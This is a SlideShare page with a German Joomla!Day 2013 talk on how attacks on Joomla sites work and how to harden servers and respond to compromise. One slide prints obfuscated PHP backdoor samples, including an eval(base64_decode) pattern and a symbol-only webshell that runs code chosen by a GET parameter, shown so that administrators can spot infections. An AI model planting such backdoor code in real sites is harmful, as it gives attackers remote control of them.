SlideShare une entreprise Scribd logo
1  sur  24
Angriffe auf Joomla
verstehen und verhindern.
Simon Samtleben
Joomla!Day Deutschland 2013
www.yagendoo.com
Simon Samtleben
@lemmingzshadow
Webentwickler @ yagendoo Media GmbH in Köln
www.yagendoo.com | lemmingzshadow.net
● PHP Entwicklung
● Joomla
● Websockets
● Serveradministration
● Debian
● Nginx
● Security
● yagendoo.com
● gulli.com
● anonym.to
● 3gstore.de
● iphoneohnevertrag.de
Inhalt
1.Wie funktionieren Angriffe auf Joomla?
1. Schwachstellen finden.
2. System „infizieren“.
3. Warum werden (Joomla) Webseiten angegriffen?
2.Wie kann ich mein System schützen?
1. Serverseitig
2. Joomla
3.Was tun wenn mein System kompromittiert wurde?
Schwachstellen finden
● Bruteforceing
– Joomla
– SSH/(S)FTP
● Google Dorks
● Sicherheitslücken
– SQL Injection
– RFC, LFC
Bild: webroot.com
Schwachstellen finden
● Bruteforceing
– Joomla
– SSH/(S)FTP
● Google Dorks
● Sicherheitslücken
– SQL Injection
– RFC, LFC
Bild: webroot.com
Schwachstellen finden
● Bruteforceing
– Joomla
– SSH/(S)FTP
● Google Dorks
● Sicherheitslücken
– SQL Injection
– RFC, LFC
System infizieren
● Vollständig automatisiert
● Typische „Injections“
– Webshells
– Iframes
– Javascripts (Cookie Bombs, ...)
– Cloaking/Redirects
– Sonstiges (IRC Bots, ...)
Bild: webroot.com
Bild: webroot.com
Warum werden (Joomla)
Webseiten angegriffen?
● Verbreitung von Malware
● Aufbau von Botnets
● E-Mail Spam
● Backlinks / SEO
● Gezielte Angriffe
– Stehlen von Daten
Die Masse macht's
Inhalt
1.Wie funktionieren Angriffe auf Joomla?
1. Schwachstellen finden.
2. System „infizieren“.
3. Warum werden (Joomla) Webseiten angegriffen?
2.Wie kann ich mein System schützen?
1. Serverseitig
2. Joomla
3.Was tun wenn mein System kompromittiert wurde?
Serverseitige Schutzmaßnahmen
● Auto IP-Blacklisting
● SSH Login nur über Keys
● Chroot für Projekte
● SFTP statt FTP
● Eigene SQL Benutzer pro Projekt
● Monitoring (Last, Prozesse, Netzwerk, …)
● Updates, Updates, Updates
Joomlaseitige Schutzmaßnahmen
● Nicht benötigte Erweiterungen löschen
– Auch bei „Schutzsoftware“ vorsichtig sein
– Vorsicht bei lange nicht aktualisierten Erweiterungen
● Regelmäßig auf Infektionen prüfen
– urlquery.net
– virustotal.com
– myjoomla.com
– Extensions
Joomlaseitige Schutzmaßnahmen
● Regelmäßige Backup
– Akeeba Backup
– Duply, Rsync, Snapshots, …
– Auch alte Backups vorhalten!
● Updates, Updates, UPDATES!
– Joomla & Extensions
– Newsletter, Blogs, Auto-Update, ...
Inhalt
1.Wie funktionieren Angriffe auf Joomla?
1. Schwachstellen finden.
2. System „infizieren“.
3. Warum werden (Joomla) Webseiten angegriffen?
2.Wie kann ich mein System schützen?
1. Serverseitig
2. Joomla
3.Was tun wenn mein System kompromittiert wurde?
Was tun wenn mein System
kompromittiert wurde?
● Don't Panic
– Keine wichtige Spuren löschen.
– Backup anlegen.
● Wenn möglich: Neu aufsetzen.
● Wenn nicht: Backup einspielen.
● Sonst: „Infektionen“ beseitigen.
Was tun wenn mein System
kompromittiert wurde?
● Infektionen sind schwer zu finden
– Einfach
● eval(base64_decode('...'));
– Schwieriger
● $eva1tYidakBcVSjr =
$eva1tYldakBcVSjr(chr(2687.5*0.016),
$eva1fYlbakBcVSir);
– Hacker :)
● $_[]++;$_[]=$_._;$_=$_[$_[+_]];$___=$__=$_[++
$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++
$___.$___.++$_.$__.++$___; $_($_GET['p']);
Fragen?
www.yagendoo.com
lemmingzshadow.net
Vielen Dank für's Zuhören!

Contenu connexe

En vedette

INTHEGA: Kultur zeitgemäß vermarkten. Facebook, Blog & Co. – Irrelevant oder ...
INTHEGA: Kultur zeitgemäß vermarkten. Facebook, Blog & Co. – Irrelevant oder ...INTHEGA: Kultur zeitgemäß vermarkten. Facebook, Blog & Co. – Irrelevant oder ...
INTHEGA: Kultur zeitgemäß vermarkten. Facebook, Blog & Co. – Irrelevant oder ...akom360
 
el rendimiento escolarProyecto 1
el rendimiento escolarProyecto 1el rendimiento escolarProyecto 1
el rendimiento escolarProyecto 1Ilder Vargas Cueva
 
Lino flores
Lino floresLino flores
Lino floreslino177
 
Erosion costera
Erosion costeraErosion costera
Erosion costeramarcecalza
 
20122013 terminliste-aktuell1
20122013 terminliste-aktuell120122013 terminliste-aktuell1
20122013 terminliste-aktuell1hvgblomberg
 
Mit Webinaren begeistern
Mit Webinaren begeisternMit Webinaren begeistern
Mit Webinaren begeisternJuergen Zirbik
 
Einladung: INSTANDHALTUNGSTAGE 2016!
Einladung: INSTANDHALTUNGSTAGE 2016!Einladung: INSTANDHALTUNGSTAGE 2016!
Einladung: INSTANDHALTUNGSTAGE 2016!MCP Deutschland GmbH
 
Bauch beine po bbp übungen
Bauch beine po   bbp übungenBauch beine po   bbp übungen
Bauch beine po bbp übungenAlexander Krauß
 
Isolieren statt dämmen 12
Isolieren statt dämmen 12Isolieren statt dämmen 12
Isolieren statt dämmen 12Burkhard Kraus
 
Heinz von Heiden KFW 70 Effizienzhaus
Heinz von Heiden KFW 70 EffizienzhausHeinz von Heiden KFW 70 Effizienzhaus
Heinz von Heiden KFW 70 Effizienzhauswirtschaftsblog
 
Guia de apoyo para estudiar quimica
Guia de apoyo para estudiar quimicaGuia de apoyo para estudiar quimica
Guia de apoyo para estudiar quimicaClaudia Negretti
 
Das Poly“zystische“ Ovar Syndrom - 14.03.2013
Das Poly“zystische“ Ovar Syndrom - 14.03.2013Das Poly“zystische“ Ovar Syndrom - 14.03.2013
Das Poly“zystische“ Ovar Syndrom - 14.03.2013IMI Kinderwunschklinik
 
Escenarios computacion 1_a_1 yadira.
Escenarios computacion 1_a_1 yadira.Escenarios computacion 1_a_1 yadira.
Escenarios computacion 1_a_1 yadira.Yadira Orozco
 
Shakespeare a-tragedia-do-rei-ricardo-ii
Shakespeare a-tragedia-do-rei-ricardo-iiShakespeare a-tragedia-do-rei-ricardo-ii
Shakespeare a-tragedia-do-rei-ricardo-iiDaniel Comparini
 

En vedette (20)

INTHEGA: Kultur zeitgemäß vermarkten. Facebook, Blog & Co. – Irrelevant oder ...
INTHEGA: Kultur zeitgemäß vermarkten. Facebook, Blog & Co. – Irrelevant oder ...INTHEGA: Kultur zeitgemäß vermarkten. Facebook, Blog & Co. – Irrelevant oder ...
INTHEGA: Kultur zeitgemäß vermarkten. Facebook, Blog & Co. – Irrelevant oder ...
 
el rendimiento escolarProyecto 1
el rendimiento escolarProyecto 1el rendimiento escolarProyecto 1
el rendimiento escolarProyecto 1
 
Lino flores
Lino floresLino flores
Lino flores
 
Erosion costera
Erosion costeraErosion costera
Erosion costera
 
Ohswald Christian
Ohswald Christian Ohswald Christian
Ohswald Christian
 
20122013 terminliste-aktuell1
20122013 terminliste-aktuell120122013 terminliste-aktuell1
20122013 terminliste-aktuell1
 
Eilers, CP3
Eilers, CP3Eilers, CP3
Eilers, CP3
 
Mit Webinaren begeistern
Mit Webinaren begeisternMit Webinaren begeistern
Mit Webinaren begeistern
 
Winter 2008
Winter 2008Winter 2008
Winter 2008
 
Einladung: INSTANDHALTUNGSTAGE 2016!
Einladung: INSTANDHALTUNGSTAGE 2016!Einladung: INSTANDHALTUNGSTAGE 2016!
Einladung: INSTANDHALTUNGSTAGE 2016!
 
Web 2.0
Web 2.0Web 2.0
Web 2.0
 
Bauch beine po bbp übungen
Bauch beine po   bbp übungenBauch beine po   bbp übungen
Bauch beine po bbp übungen
 
Isolieren statt dämmen 12
Isolieren statt dämmen 12Isolieren statt dämmen 12
Isolieren statt dämmen 12
 
Heinz von Heiden KFW 70 Effizienzhaus
Heinz von Heiden KFW 70 EffizienzhausHeinz von Heiden KFW 70 Effizienzhaus
Heinz von Heiden KFW 70 Effizienzhaus
 
Gat1 (1)
Gat1 (1)Gat1 (1)
Gat1 (1)
 
Guia de apoyo para estudiar quimica
Guia de apoyo para estudiar quimicaGuia de apoyo para estudiar quimica
Guia de apoyo para estudiar quimica
 
Mapa mentales.
Mapa mentales.Mapa mentales.
Mapa mentales.
 
Das Poly“zystische“ Ovar Syndrom - 14.03.2013
Das Poly“zystische“ Ovar Syndrom - 14.03.2013Das Poly“zystische“ Ovar Syndrom - 14.03.2013
Das Poly“zystische“ Ovar Syndrom - 14.03.2013
 
Escenarios computacion 1_a_1 yadira.
Escenarios computacion 1_a_1 yadira.Escenarios computacion 1_a_1 yadira.
Escenarios computacion 1_a_1 yadira.
 
Shakespeare a-tragedia-do-rei-ricardo-ii
Shakespeare a-tragedia-do-rei-ricardo-iiShakespeare a-tragedia-do-rei-ricardo-ii
Shakespeare a-tragedia-do-rei-ricardo-ii
 

Similaire à Angriffe auf Joomla verstehen und verhindern - Joomladay Deutschland 2013

Vorsicht: Fallstricke in der digitalen Welt für den Handelsagenten
Vorsicht: Fallstricke in der digitalen Welt für den HandelsagentenVorsicht: Fallstricke in der digitalen Welt für den Handelsagenten
Vorsicht: Fallstricke in der digitalen Welt für den HandelsagentenMag.Natascha Ljubic
 
Joomlaplatform deutsch
Joomlaplatform deutschJoomlaplatform deutsch
Joomlaplatform deutschRobert Deutz
 
Die Top 5 Mythen der SAP Sicherheit
Die Top 5 Mythen der SAP SicherheitDie Top 5 Mythen der SAP Sicherheit
Die Top 5 Mythen der SAP SicherheitVirtual Forge
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityJonathan Weiss
 
Digitale Fallstricke für Handelsagenten
Digitale Fallstricke für HandelsagentenDigitale Fallstricke für Handelsagenten
Digitale Fallstricke für HandelsagentenMag.Natascha Ljubic
 
Website Performance
Website PerformanceWebsite Performance
Website Performanceskyfyre
 
2017 05 16_trend_micro_webinar_wanna_cry1_ppt
2017 05 16_trend_micro_webinar_wanna_cry1_ppt2017 05 16_trend_micro_webinar_wanna_cry1_ppt
2017 05 16_trend_micro_webinar_wanna_cry1_pptAndreas Pelka
 
WordPress Sicherheit
WordPress SicherheitWordPress Sicherheit
WordPress SicherheitDietmar Leher
 
Security Task Manager 2.0 erkennt Schwachstellen in Ihrem Browser und in Windows
Security Task Manager 2.0 erkennt Schwachstellen in Ihrem Browser und in WindowsSecurity Task Manager 2.0 erkennt Schwachstellen in Ihrem Browser und in Windows
Security Task Manager 2.0 erkennt Schwachstellen in Ihrem Browser und in WindowsNeuberSoftware
 
Rex - Infrastruktur als Code
Rex - Infrastruktur als CodeRex - Infrastruktur als Code
Rex - Infrastruktur als CodeJan Gehring
 
Rahmenbedingungen mobile security
Rahmenbedingungen mobile securityRahmenbedingungen mobile security
Rahmenbedingungen mobile securityPeter Teufl
 
Webinar: Online Security
Webinar: Online SecurityWebinar: Online Security
Webinar: Online Securitykuehlhaus AG
 
MongoDB: Security-Tipps gegen Hacker
MongoDB: Security-Tipps gegen HackerMongoDB: Security-Tipps gegen Hacker
MongoDB: Security-Tipps gegen HackerGregor Biswanger
 
Microsoft Cyber Security IT-Camp
Microsoft Cyber Security IT-CampMicrosoft Cyber Security IT-Camp
Microsoft Cyber Security IT-CampAlexander Benoit
 

Similaire à Angriffe auf Joomla verstehen und verhindern - Joomladay Deutschland 2013 (18)

Web Applikations Security
Web Applikations SecurityWeb Applikations Security
Web Applikations Security
 
Vorsicht: Fallstricke in der digitalen Welt für den Handelsagenten
Vorsicht: Fallstricke in der digitalen Welt für den HandelsagentenVorsicht: Fallstricke in der digitalen Welt für den Handelsagenten
Vorsicht: Fallstricke in der digitalen Welt für den Handelsagenten
 
Joomlaplatform deutsch
Joomlaplatform deutschJoomlaplatform deutsch
Joomlaplatform deutsch
 
Die Top 5 Mythen der SAP Sicherheit
Die Top 5 Mythen der SAP SicherheitDie Top 5 Mythen der SAP Sicherheit
Die Top 5 Mythen der SAP Sicherheit
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Digitale Fallstricke für Handelsagenten
Digitale Fallstricke für HandelsagentenDigitale Fallstricke für Handelsagenten
Digitale Fallstricke für Handelsagenten
 
XPages - The Basics
XPages - The BasicsXPages - The Basics
XPages - The Basics
 
Website Performance
Website PerformanceWebsite Performance
Website Performance
 
2017 05 16_trend_micro_webinar_wanna_cry1_ppt
2017 05 16_trend_micro_webinar_wanna_cry1_ppt2017 05 16_trend_micro_webinar_wanna_cry1_ppt
2017 05 16_trend_micro_webinar_wanna_cry1_ppt
 
WordPress Sicherheit
WordPress SicherheitWordPress Sicherheit
WordPress Sicherheit
 
Security Task Manager 2.0 erkennt Schwachstellen in Ihrem Browser und in Windows
Security Task Manager 2.0 erkennt Schwachstellen in Ihrem Browser und in WindowsSecurity Task Manager 2.0 erkennt Schwachstellen in Ihrem Browser und in Windows
Security Task Manager 2.0 erkennt Schwachstellen in Ihrem Browser und in Windows
 
Rex - Infrastruktur als Code
Rex - Infrastruktur als CodeRex - Infrastruktur als Code
Rex - Infrastruktur als Code
 
Rahmenbedingungen mobile security
Rahmenbedingungen mobile securityRahmenbedingungen mobile security
Rahmenbedingungen mobile security
 
Webinar: Online Security
Webinar: Online SecurityWebinar: Online Security
Webinar: Online Security
 
Joomla
JoomlaJoomla
Joomla
 
MongoDB: Security-Tipps gegen Hacker
MongoDB: Security-Tipps gegen HackerMongoDB: Security-Tipps gegen Hacker
MongoDB: Security-Tipps gegen Hacker
 
Symfony2 admin bundles
Symfony2 admin bundlesSymfony2 admin bundles
Symfony2 admin bundles
 
Microsoft Cyber Security IT-Camp
Microsoft Cyber Security IT-CampMicrosoft Cyber Security IT-Camp
Microsoft Cyber Security IT-Camp
 

Angriffe auf Joomla verstehen und verhindern - Joomladay Deutschland 2013

  • 1. Angriffe auf Joomla verstehen und verhindern. Simon Samtleben Joomla!Day Deutschland 2013 www.yagendoo.com
  • 2. Simon Samtleben @lemmingzshadow Webentwickler @ yagendoo Media GmbH in Köln www.yagendoo.com | lemmingzshadow.net ● PHP Entwicklung ● Joomla ● Websockets ● Serveradministration ● Debian ● Nginx ● Security ● yagendoo.com ● gulli.com ● anonym.to ● 3gstore.de ● iphoneohnevertrag.de
  • 3. Inhalt 1.Wie funktionieren Angriffe auf Joomla? 1. Schwachstellen finden. 2. System „infizieren“. 3. Warum werden (Joomla) Webseiten angegriffen? 2.Wie kann ich mein System schützen? 1. Serverseitig 2. Joomla 3.Was tun wenn mein System kompromittiert wurde?
  • 4. Schwachstellen finden ● Bruteforceing – Joomla – SSH/(S)FTP ● Google Dorks ● Sicherheitslücken – SQL Injection – RFC, LFC
  • 6. Schwachstellen finden ● Bruteforceing – Joomla – SSH/(S)FTP ● Google Dorks ● Sicherheitslücken – SQL Injection – RFC, LFC
  • 8. Schwachstellen finden ● Bruteforceing – Joomla – SSH/(S)FTP ● Google Dorks ● Sicherheitslücken – SQL Injection – RFC, LFC
  • 9. System infizieren ● Vollständig automatisiert ● Typische „Injections“ – Webshells – Iframes – Javascripts (Cookie Bombs, ...) – Cloaking/Redirects – Sonstiges (IRC Bots, ...)
  • 12.
  • 13. Warum werden (Joomla) Webseiten angegriffen? ● Verbreitung von Malware ● Aufbau von Botnets ● E-Mail Spam ● Backlinks / SEO ● Gezielte Angriffe – Stehlen von Daten
  • 15. Inhalt 1.Wie funktionieren Angriffe auf Joomla? 1. Schwachstellen finden. 2. System „infizieren“. 3. Warum werden (Joomla) Webseiten angegriffen? 2.Wie kann ich mein System schützen? 1. Serverseitig 2. Joomla 3.Was tun wenn mein System kompromittiert wurde?
  • 16. Serverseitige Schutzmaßnahmen ● Auto IP-Blacklisting ● SSH Login nur über Keys ● Chroot für Projekte ● SFTP statt FTP ● Eigene SQL Benutzer pro Projekt ● Monitoring (Last, Prozesse, Netzwerk, …) ● Updates, Updates, Updates
  • 17. Joomlaseitige Schutzmaßnahmen ● Nicht benötigte Erweiterungen löschen – Auch bei „Schutzsoftware“ vorsichtig sein – Vorsicht bei lange nicht aktualisierten Erweiterungen ● Regelmäßig auf Infektionen prüfen – urlquery.net – virustotal.com – myjoomla.com – Extensions
  • 18. Joomlaseitige Schutzmaßnahmen ● Regelmäßige Backup – Akeeba Backup – Duply, Rsync, Snapshots, … – Auch alte Backups vorhalten! ● Updates, Updates, UPDATES! – Joomla & Extensions – Newsletter, Blogs, Auto-Update, ...
  • 19. Inhalt 1.Wie funktionieren Angriffe auf Joomla? 1. Schwachstellen finden. 2. System „infizieren“. 3. Warum werden (Joomla) Webseiten angegriffen? 2.Wie kann ich mein System schützen? 1. Serverseitig 2. Joomla 3.Was tun wenn mein System kompromittiert wurde?
  • 20.
  • 21. Was tun wenn mein System kompromittiert wurde? ● Don't Panic – Keine wichtige Spuren löschen. – Backup anlegen. ● Wenn möglich: Neu aufsetzen. ● Wenn nicht: Backup einspielen. ● Sonst: „Infektionen“ beseitigen.
  • 22. Was tun wenn mein System kompromittiert wurde? ● Infektionen sind schwer zu finden – Einfach ● eval(base64_decode('...')); – Schwieriger ● $eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir); – Hacker :) ● $_[]++;$_[]=$_._;$_=$_[$_[+_]];$___=$__=$_[++ $__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++ $___.$___.++$_.$__.++$___; $_($_GET['p']);
  • 24. Vielen Dank für's Zuhören!